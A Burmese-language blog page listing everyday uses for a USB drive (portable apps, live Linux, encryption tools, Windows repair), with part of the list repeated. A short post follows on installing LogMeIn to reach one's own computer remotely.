3. Democra key ျဖင့္ လုံျခဳံစိတ္ခ်စြာ အလုပ္လုပ္သုံးစြဲနိုင္ပါတယ္တကယ္လို႔ USB drive ကိုျဖစ္ေစ၊ PC ကိုျဖစ္ေစ သုံးစြဲရတာ ကိုယ့္ရဲ့ကိုယ္ေရး အခ်က္အလက္ေတြနဲ႔ ကိုယ္ေရး ကိုယ္တာဖိုင္ေတြ မလုံျခဳံဘူးလို႔ ခံစားရရင္ Democra Key ကို download ရယူ၍ windows platform ေတြေပၚ မွာ အလုပ္လုပ္နိုင္ေသာ web application တစ္ခုလို သုံးစြဲနိုင္ပါတယ္။ အဲဒီအထဲမွာ ပုံရိပ္တည္းျဖတ္ တာေတြ၊ email ဖြင့္စစ္တာေတြ၊ ကိုယ္ေရးကိုယ္တာ အခ်က္အလက္ေတြကို encrypt ျပဳလုပ္တာေတြနဲ႔ Internet ကို browse လုပ္တာေတြ ျပဳလုပ္နိုင္ပါတယ္။ လုံျခဳံမွုအျပည့္အဝ ရွိပါတယ္။
4. XBMC Media Center ကို ထည့္သြင္းထားနိုင္ပါတယ္ကိုယ့္ PC မွာ WMP player နဲ႔ အျခား player မ်ားစြာရွိေပ မယ့္ XBMC live ကို ရယူၿပီး drive ထဲကို ထည့္သြင္း ထားမယ္ဆိုရင္ netbook မွာပဲျဖစ္ျဖစ္၊ laptop မွာပဲ ျဖစ္ျဖစ္ media file ေတြကို အလြယ္တကူ ၾကည့္ရွုခံစား နိုင္ပါတယ္။ အဲဒီအထဲမွာ အလြယ္တကူနဲ႔ လုပ္ေဆာင္နိုင္တဲ့ လုပ္ေဆာင္နိုင္တဲ့ လမ္းညြန္ခ်က္ေတြကို သင္ခန္းစာ ဖိုင္ေတြအေနနဲ႔ ၾကည့္ရွုၿပီး လိုက္လံလုပ္ေဆာင္နိုင္ပါတယ္။
5. Windows System တစ္ခုလုံးကို save လုပ္ထားနိုင္ပါတယ္တကယ္လို႔ Thumb drive ထဲမွာ Ubuntu စနစ္ တစ္ခုလုံးကို ထည့္သြင္းထားမယ္ဆိုရင္ windows ရဲ့စနစ္မွာ မွားယြင္းေနတဲ့အမွားေတြ၊ error ေတြ အားလုံးကို ubuntu ကတစ္ဆင့္ boot လုပ္ၿပီး ဝင္ေရာက္ၾကည့္ရွုရင္း ျပင္ဆင္နိုင္ပါတယ္။ ထို႔အတြက္ ပုန္းေအာင္းေနတဲ့ ဖိုင္ေတြ၊ ဖိုင္ေယာင္ေဆာင္ထားတဲ့ virus ေတြကို အလြယ္ တကူ ၾကည့္ရွုသတ္ပစ္နိုင္ၿပီး drive space ကို သန႔္သန႔္ရွင္းရွင္း analyze လုပ္နိုင္ပါတယ္။ Partition လုပ္တာ ေတြ၊ windows password ေတြကို ျပန္ေခၚ တာနဲ႔ ေပ်ာက္ဆုံးေနတဲ့ file ေတြကို ျပန္လည္ရွာေဖြတာေတြ ျပဳလုပ္ နိုင္ပါတယ္။ လုပ္ေဆာင္ပုံ နည္းအေသး စိတ္ကို lifehacker.com မွာ ၾကည့္ရွုနိုင္ပါတယ္။
6. USB Drive ကေနတစ္ဆင့္ Windows စနစ္တစ္ခုလုံးကို အမိန႔္ေပး ထိန္းခ်ဳပ္နိုင္ပါတယ္Windows ျပန္လည္ စတင္ခ်ိန္မွာ USB drive ကေန log off လုပ္တာေတြ၊ shut down လုပ္တာေတြကို USB drive ရဲ့ click ကို ႏွိပ္လိုက္ တာနဲ႔ အထဲထဲမွာ အမိန႔္ေပး file ေတြကို တန္းစီၿပီး ထည့္သြင္းဖို႔အတြက္ coding ေတြ လြယ္လင့္တကူ ရွိပါတယ္။
7. သယ္ေဆာင္ရ လြယ္ကူေသာ Windows Suite တစ္ခုလုံးကို ထည့္သြင္းသြားနိုင္ပါတယ္Portableapps.com မွာ ေရြ႕ေျပာင္း သယ္ယူရလြယ္တဲ့ software ကေလးေတြ၊ ဥပမာ Photoshop, acrobat reader, firefo×, gtalk စတဲ့ software ကေလးေတြကို download ရယူၿပီး USB drive ထဲ ထည့္ထားမယ္ ဆိုရင္ windows အတြက္ ေနရာ လြတ္ေတြမ်ားစြာ ထြက္ေပၚလာေစပါမယ္။ Memory အရမ္းစားတဲ့ software ေတြ ဆိုလို႔ရွိရင္လည္း memory အစား သက္သာသြားပါမယ္။ ဒါ့အျပင္ ႐ုံးက ကြန္ပ်ဴတာမွာ ကိုယ္လိုခ်င္တဲ့ software မရွိလို႔ အိမ္ျပန္အလုပ္လုပ္ လို႔ မရတဲ့သူေတြအတြက္လည္း အခ်ိန္ကုန္သက္သာ သြားေစပါတယ္။ Portable software ေတြဟာ software ႀကီးေတြက လြဲလို႔ function အစုံအလင္ ပါရွိၿပီး ပုံမွန္အတိုင္း အလုပ္ လုပ္နိုင္ပါတယ္။
8. USB Drive ထဲမွာ အေရးႀကီး Data ေတြကို ထားရွိနိုင္ပါတယ္တစ္ခ်ိဳ႕ မိသားစုနဲ႔ ပတ္သက္တဲ့ ကိုယ္ေရး ကိုယ္တာ ဖိုင္ေတြ၊ ကိုယ့္ရဲ့ အႀကံအစည္နဲ႔ ပတ္သက္တဲ့ idea စိတ္ကူး ေတြကို USB drive ထဲကို ထည့္သြင္း ထားၿပီး အဲဒီ USB ကို USB safeguard သုံးစြဲလိုက္ မယ္ဆိုရင္ USB ကို လက္လြတ္စပယ္ ထားခဲ့မယ္ဆို တာေတာင္မွ ကိုယ့္ဖိုင္ကို ဝင္ၾကည့္တဲ့အခါမွာ password ေတာင္းတာမ်ိဳးေတြ၊ ဖိုင္ကို ဝွက္ထားတာမ်ိဳးေတြ၊ ဖိုင္ပုံစံ ေဖ်ာက္ထားတာမ်ိဳးေတြ လုပ္ထားနိုင္တဲ့အတြက္ အဆင္ေျပပါတယ္။
9. လိုခ်င္တဲ့အခ်ိန္ေတြမွာ ဖိုင္ေတြကို ေရြ႕ေျပာင္းနိုင္ပါတယ္USB drive နဲ႔ hard drive ၾကားထဲမွာ ဖိုင္ေတြ ကို ေရြ႕ေျပာင္းတာ အလြန္လြယ္ကူပါတယ္။ USB ရဲ့ နည္းပညာ ျမင့္မားရင္ ျမင့္မားသလို ေရြ႕ေျပာင္းရ လြယ္ကူ ၿပီး ျမန္ဆန္ပါတယ္။ တကယ္လို႔ internet မွာ နာမည္ႀကီးေနတဲ့ ဖိုင္တင္တဲ့ upload sharing site ျဖစ္ၿပီး application မွာ ထုတ္ေပးထားတဲ့ drop bo× နဲ႔ဆိုရင္ USB ထဲက ဖိုင္ ေတြကို အဲဒီထဲထည့္တာေတြ၊ Online ေပၚမွာ ၾကည့္ရွုေနတဲ့အခ်ိန္မွာ ႐ုံးကေနတစ္ဆင့္ drop bo× ထဲ ထည့္သြင္းသိမ္းဆည္းထားၿပီး အိမ္ကေနတစ္ဆင့္ အလြယ္တကူ ျပန္လည္ၾကည့္ရွုနိုင္ပါတယ္။
10. Linu× OS ကို USB Drive ထဲ ထည့္သြင္းထားနိုင္ပါတယ္Linu× အႏြယ္ဝင္ OS ေတြဟာ virus အနတရာယ္ ကင္းရွင္းေစၿပီး သုံးစြဲရ လြယ္ကူတဲ့အျပင္ အခုဆိုရင္ ေရြ႕ေျပာင္း သယ္ေဆာင္ရ လြယ္ကူတဲ့ Portable Linu× OS ေတြပါ ထြက္ရွိလာတဲ့အတြက္ drive ထဲကို ထည့္သြင္းထားၿပီး အလုပ္လုပ္တဲ့အခါမွာ- ဥပမာ ႐ုံးမွာ virus ေတြ အလြန္ကိုက္ေနတဲ့အတြက္ ႐ုံးက virus ေတြ အိမ္က ကြန္ပ်ဴတာကို ပါလာမွာ စိုးရိမ္ေနသူမ်ားအတြက္ အလြန္ အသုံးဝင္ၿပီး ႐ုံးမွအိမ္၊ အိမ္မွ႐ုံး USB drive မွတစ္ဆင့္ လြယ္ကူစြာ အလုပ္လုပ္နိုင္မွာ ျဖစ္ပါတယ္။
1. USB Drive ကို icon အေနနဲ႔ သုံးနိုင္ပါတယ္တကယ္လို႔ ကြန္ပ်ဴတာမွာ USB Hub တစ္ခုကို ထားရွိသုံးစြဲမယ္ ဆိုရင္၊ ေနာက္ၿပီး USB အမ်ားႀကီးနဲ႔ Multiple USB port ေတြ ထားရွိ သုံးစြဲမယ္ဆိုရင္ အမ်ိဳးမ်ိဳး အစားစားကြဲျပားတဲ့ ကိုယ့္ရဲ့ USB ကို icon ေတြအေနနဲ႔ ေဖာ္ျပ ေပးထားနိုင္ပါတယ္။ အဲဒီလို ေဖာ္ျပေပးတဲ့ XP, Vista, Windows 7 ေတြမွာ ပါဝင္တဲ့ custom icon ေတြကို အသုံးျပဳၿပီး folder ေတြကို icon ပုံစံခ်ိန္းတဲ့ ပုံစံမ်ိဳးအဆင့္ပဲ လြယ္လြယ္ ကူကူ ရွိပါတယ္။ ပထမဦးဆုံးအေနနဲ႔ (.ico) format ကို drive ထဲမွာ အရင္ ေမာင္းထည့္ရ ပါမယ္။ အကယ္၍ web application တစ္ခုျဖစ္တဲ့ convert icon ကို အသုံးျပဳလည္း ရပါတယ္။ icon ကို အမ်ိဳးအစားကြဲျပားစြာနဲ႔ USB မွာ ရည္ညြန္းေဖာ္ျပေပးမွာ ျဖစ္တဲ့အတြက္ ဘယ္ USB က ဘာ file ေတြ ပါဝင္တယ္ဆိုတာ အလြယ္တကူ သိရွိရမွာပါ။
2. Google ၏ OS ကို အိတ္ထဲ ထည့္ထားနိုင္ပါတယ္Google ၏ OS ျဖစ္တဲ့ Chrome OS ကို USB drive ထဲမွာ ထည့္သြင္းၿပီး ကိုယ့္ကြန္ပ်ဴတာရဲ့ ဒုတိယ OS အျဖစ္ ထားရွိ သုံးစြဲနိုင္ပါတယ္။ အလြန္ျမန္ဆန္ၿပီး ကိုယ့္စိတ္ႀကိဳက္ custom ျပဳလုပ္ထားနိုင္ပါတယ္။ ဒီဇိုင္း အဆင္အျပင္ေတြကအစ ပါဝင္တဲ့ coding ေတြကို သြားျပန္ၿပီး ျပင္ဆင္ေရး သားနိုင္တဲ့ open source OS တစ္ခု ျဖစ္ပါတယ္။
3. Democra key ျဖင့္ လုံျခဳံစိတ္ခ်စြာ အလုပ္လုပ္သုံးစြဲနိုင္ပါတယ္တကယ္လို႔ USB drive ကိုျဖစ္ေစ၊ PC ကိုျဖစ္ေစ သုံးစြဲရတာ ကိုယ့္ရဲ့ကိုယ္ေရး အခ်က္အလက္ေတြနဲ႔ ကိုယ္ေရး ကိုယ္တာဖိုင္ေတြ မလုံျခဳံဘူးလို႔ ခံစားရရင္ Democra Key ကို download ရယူ၍ windows platform ေတြေပၚ မွာ အလုပ္လုပ္နိုင္ေသာ web application တစ္ခုလို သုံးစြဲနိုင္ပါတယ္။ အဲဒီအထဲမွာ ပုံရိပ္တည္းျဖတ္ တာေတြ၊ email ဖြင့္စစ္တာေတြ၊ ကိုယ္ေရးကိုယ္တာ အခ်က္အလက္ေတြကို encrypt ျပဳလုပ္တာေတြနဲ႔ Internet ကို browse လုပ္တာေတြ ျပဳလုပ္နိုင္ပါတယ္။ လုံျခဳံမွုအျပည့္အဝ ရွိပါတယ္။
4. XBMC Media Center ကို ထည့္သြင္းထားနိုင္ပါတယ္ကိုယ့္ PC မွာ WMP player နဲ႔ အျခား player မ်ားစြာရွိေပ မယ့္ XBMC live ကို ရယူၿပီး drive ထဲကို ထည့္သြင္း ထားမယ္ဆိုရင္ netbook မွာပဲျဖစ္ျဖစ္၊ laptop မွာပဲ ျဖစ္ျဖစ္ media file ေတြကို အလြယ္တကူ ၾကည့္ရွုခံစား နိုင္ပါတယ္။ အဲဒီအထဲမွာ အလြယ္တကူနဲ႔ လုပ္ေဆာင္နိုင္တဲ့ လုပ္ေဆာင္နိုင္တဲ့ လမ္းညြန္ခ်က္ေတြကို သင္ခန္းစာ ဖိုင္ေတြအေနနဲ႔ ၾကည့္ရွုၿပီး လိုက္လံလုပ္ေဆာင္နိုင္ပါတယ္။
5. Windows System တစ္ခုလုံးကို save လုပ္ထားနိုင္ပါတယ္တကယ္လို႔ Thumb drive ထဲမွာ Ubuntu စနစ္ တစ္ခုလုံးကို ထည့္သြင္းထားမယ္ဆိုရင္ windows ရဲ့စနစ္မွာ မွားယြင္းေနတဲ့အမွားေတြ၊ error ေတြ အားလုံးကို ubuntu ကတစ္ဆင့္ boot လုပ္ၿပီး ဝင္ေရာက္ၾကည့္ရွုရင္း ျပင္ဆင္နိုင္ပါတယ္။ ထို႔အတြက္ ပုန္းေအာင္းေနတဲ့ ဖိုင္ေတြ၊ ဖိုင္ေယာင္ေဆာင္ထားတဲ့ virus ေတြကို အလြယ္ တကူ ၾကည့္ရွုသတ္ပစ္နိုင္ၿပီး drive space ကို သန႔္သန႔္ရွင္းရွင္း analyze လုပ္နိုင္ပါတယ္။ Partition လုပ္တာ ေတြ၊ windows password ေတြကို ျပန္ေခၚ တာနဲ႔ ေပ်ာက္ဆုံးေနတဲ့ file ေတြကို ျပန္လည္ရွာေဖြတာေတြ ျပဳလုပ္ နိုင္ပါတယ္။ လုပ္ေဆာင္ပုံ နည္းအေသး စိတ္ကို lifehacker.com မွာ ၾကည့္ရွုနိုင္ပါတယ္။
6. USB Drive ကေနတစ္ဆင့္ Windows စနစ္တစ္ခုလုံးကို အမိန႔္ေပး ထိန္းခ်ဳပ္နိုင္ပါတယ္Windows ျပန္လည္ စတင္ခ်ိန္မွာ USB drive ကေန log off လုပ္တာေတြ၊ shut down လုပ္တာေတြကို USB drive ရဲ့ click ကို ႏွိပ္လိုက္ တာနဲ႔ အထဲထဲမွာ အမိန႔္ေပး file ေတြကို တန္းစီၿပီး ထည့္သြင္းဖို႔အတြက္ coding ေတြ လြယ္လင့္တကူ ရွိပါတယ္။
7. သယ္ေဆာင္ရ လြယ္ကူေသာ Windows Suite တစ္ခုလုံးကို ထည့္သြင္းသြားနိုင္ပါတယ္Portableapps.com မွာ ေရြ႕ေျပာင္း သယ္ယူရလြယ္တဲ့ software ကေလးေတြ၊ ဥပမာ Photoshop, acrobat reader, firefo×, gtalk စတဲ့ software ကေလးေတြကို download ရယူၿပီး USB drive ထဲ ထည့္ထားမယ္ ဆိုရင္ windows အတြက္ ေနရာ လြတ္ေတြမ်ားစြာ ထြက္ေပၚလာေစပါမယ္။ Memory အရမ္းစားတဲ့ software ေတြ ဆိုလို႔ရွိရင္လည္း memory အစား သက္သာသြားပါမယ္။ ဒါ့အျပင္ ႐ုံးက ကြန္ပ်ဴတာမွာ ကိုယ္လိုခ်င္တဲ့ software မရွိလို႔ အိမ္ျပန္အလုပ္လုပ္ လို႔ မရတဲ့သူေတြအတြက္လည္း အခ်ိန္ကုန္သက္သာ သြားေစပါတယ္။ Portable software ေတြဟာ software ႀကီးေတြက လြဲလို႔ function အစုံအလင္ ပါရွိၿပီး ပုံမွန္အတိုင္း အလုပ္ လုပ္နိုင္ပါတယ္။
8. USB Drive ထဲမွာ အေရးႀကီး Data ေတြကို ထားရွိနိုင္ပါတယ္တစ္ခ်ိဳ႕ မိသားစုနဲ႔ ပတ္သက္တဲ့ ကိုယ္ေရး ကိုယ္တာ ဖိုင္ေတြ၊ ကိုယ့္ရဲ့ အႀကံအစည္နဲ႔ ပတ္သက္တဲ့ idea စိတ္ကူး ေတြကို USB drive ထဲကို ထည့္သြင္း ထားၿပီး အဲဒီ USB ကို USB safeguard သုံးစြဲလိုက္ မယ္ဆိုရင္ USB ကို လက္လြတ္စပယ္ ထားခဲ့မယ္ဆို တာေတာင္မွ ကိုယ့္ဖိုင္ကို ဝင္ၾကည့္တဲ့အခါမွာ password ေတာင္းတာမ်ိဳးေတြ၊ ဖိုင္ကို ဝွက္ထားတာမ်ိဳးေတြ၊ ဖိုင္ပုံစံ ေဖ်ာက္ထားတာမ်ိဳးေတြ လုပ္ထားနိုင္တဲ့အတြက္ အဆင္ေျပပါတယ္။
9. လိုခ်င္တဲ့အခ်ိန္ေတြမွာ ဖိုင္ေတြကို ေရြ႕ေျပာင္းနိုင္ပါတယ္USB drive နဲ႔ hard drive ၾကားထဲမွာ ဖိုင္ေတြ ကို ေရြ႕ေျပာင္းတာ အလြန္လြယ္ကူပါတယ္။ USB ရဲ့ နည္းပညာ ျမင့္မားရင္ ျမင့္မားသလို ေရြ႕ေျပာင္းရ လြယ္ကူ ၿပီး ျမန္ဆန္ပါတယ္။ တကယ္လို႔ internet မွာ နာမည္ႀကီးေနတဲ့ ဖိုင္တင္တဲ့ upload sharing site ျဖစ္ၿပီး application မွာ ထုတ္ေပးထားတဲ့ drop bo× နဲ႔ဆိုရင္ USB ထဲက ဖိုင္ ေတြကို အဲဒီထဲထည့္တာေတြ၊ Online ေပၚမွာ ၾကည့္ရွုေနတဲ့အခ်ိန္မွာ ႐ုံးကေနတစ္ဆင့္ drop bo× ထဲ ထည့္သြင္းသိမ္းဆည္းထားၿပီး အိမ္ကေနတစ္ဆင့္ အလြယ္တကူ ျပန္လည္ၾကည့္ရွုနိုင္ပါတယ္။
10. Linu× OS ကို USB Drive ထဲ ထည့္သြင္းထားနိုင္ပါတယ္Linu× အႏြယ္ဝင္ OS ေတြဟာ virus အနတရာယ္ ကင္းရွင္းေစၿပီး သုံးစြဲရ လြယ္ကူတဲ့အျပင္ အခုဆိုရင္ ေရြ႕ေျပာင္း သယ္ေဆာင္ရ လြယ္ကူတဲ့ Portable Linu× OS ေတြပါ ထြက္ရွိလာတဲ့အတြက္ drive ထဲကို ထည့္သြင္းထားၿပီး အလုပ္လုပ္တဲ့အခါမွာ- ဥပမာ ႐ုံးမွာ virus ေတြ အလြန္ကိုက္ေနတဲ့အတြက္ ႐ုံးက virus ေတြ အိမ္က ကြန္ပ်ဴတာကို ပါလာမွာ စိုးရိမ္ေနသူမ်ားအတြက္ အလြန္ အသုံးဝင္ၿပီး ႐ုံးမွအိမ္၊ အိမ္မွ႐ုံး USB drive မွတစ္ဆင့္ လြယ္ကူစြာ အလုပ္လုပ္နိုင္မွာ ျဖစ္ပါတယ္။
Saturday, July 14
Hack with Logme In
ဒီေဆာ့၀ဲေလးရဲ့ရည္ရြယ္ခ်က္ကေတာ့တစ္ေနရာကကြန္ျပဴတာကေနနက္၀ပ္ခ်ိတ္ထားတဲ့
တစ္ျခားကြန္ျပဴတာတစ္လံုးကိုျပဳျပင္ႏိုင္ေစဖို႕ရည္ရြယ္တာပါ။ဒီေဆာ့၀ဲေလး အေၾကာင္းကို နားလည္သြားရင္
ဘယ္သူကိုမွသြားၿပီး ဒုတ္ခမေပး ဖို. အဲဒီအတြက္ ႀကိဳၿပီး ေျပာထားပရေစ။
၁။ www.logmein.com ကို၀င္ပါ။ ၿပီးရင္ Download logmein free ဆိုတဲ့ အစိမ္းေရာင္ အကြက္ေလးကို ကလစ္လုပ္ပါ။
ၿပီးရင္ အီးေမးလ္ တို. ဘာညာတို. ရိုက္ၿပီး အေကာင့္ ဖြြင့္ပါ။ ၿပီးရင္ Go ကို ႏွိပ္။
၂။ၿပီးရင္ add computer ကို ထပ္ႏိွပ္။ ၿပီးရင္ ေဆာ့၀ဲကို ေဒါင္းေလာ့ဆြဲပါ။
၃။ ၿပီးရင္ ေဆာ့၀ဲကို Run လိုက္ပါ။ Next => I agree => typical => Next =>Next=>
computer access code ဆိုၿပီးေတာင္းရင္ ေပးခ်င္တဲ့ password 8 လံုးေပးလိုက္ပါ။ ေအာက္မွာလည္း
အဲ ဒီ 8 လံုးပဲ ျပန္ရိုက္။ ကိုယ္ေပးထားတာေတာ့ မွက္ထားဦးေနာ္။
၄။ Email ေတာင္းရင္ ခုနက အေကာင့္ ဖြင့္တုန္းက ေပးခဲ့တဲ့ အီးေမးကို ျပန္ထည့္။ password ကလဲ အေကာင့္ဖြင့္တုန္းကေပးတဲ့ password ပဲအင။ ၿပီးရင္ Next ကို မႏွိပ္နဲ.ဦး။ logmein freee ဆိုတာေရြးေပးလိုက္ဦး။
ၿပီးမွ Next လုပ္။
၅။ အင္စေတာလုပ္ၿပီးသြားရင္ Restart ခ်ရလိမ့္မယ္။ ဒါဆိုရင္ ၿပီးသြားပါၿပီ။ Task Bar ရဲ့ ညာဘက္ေအာက္မွာ ေခြးေျခရာ
ပံုေလးေပၚေနပါလိမ့္မယ္။
၆။ အဲဒီ ကြန္ျပဴတာကို ဖြင့္ထားၿပီး
တျခားကြန္ျပဴတာကေနၿပီး အင္တာနက္က www.logmein.com ဆိုတဲ့ ၀က္ဆိုဒ္ကို ျပန္၀င္
၇။ ၀ဘ္ဆိုဒ္ရဲ့ ညာဘက္ ထိတ္နာမွာ Email မွာ ကိုယ္အေကာင့္ဖြင့္ထားတဲ့ အီးေမးလ္ ရိုက္ထည့္ ၊ ၿပီးရင္ Password ေပါ့။
Enter ။
က်န္တာေတြကေတာ့ ကိုယ့္ဘာသာစမ္းလို.ရလိမ့္မယ္လို. ထင္ပါတယ္။
နိဳင္ငံရပ္ျခားက ကြန္ျပဴတာေတြကို ကိုယ့္ေနရာကေနၿပီး လွမ္းျပင္နိဳင္ပါေစဗ်ာ။
MCDA မွဖ်က္ခုတ္လာသည္ (ပို႕အသစ္မတင္ျဖစ္ႏိုင္ေသာေၾကာင့္)
Subscribe to:
Posts (Atom)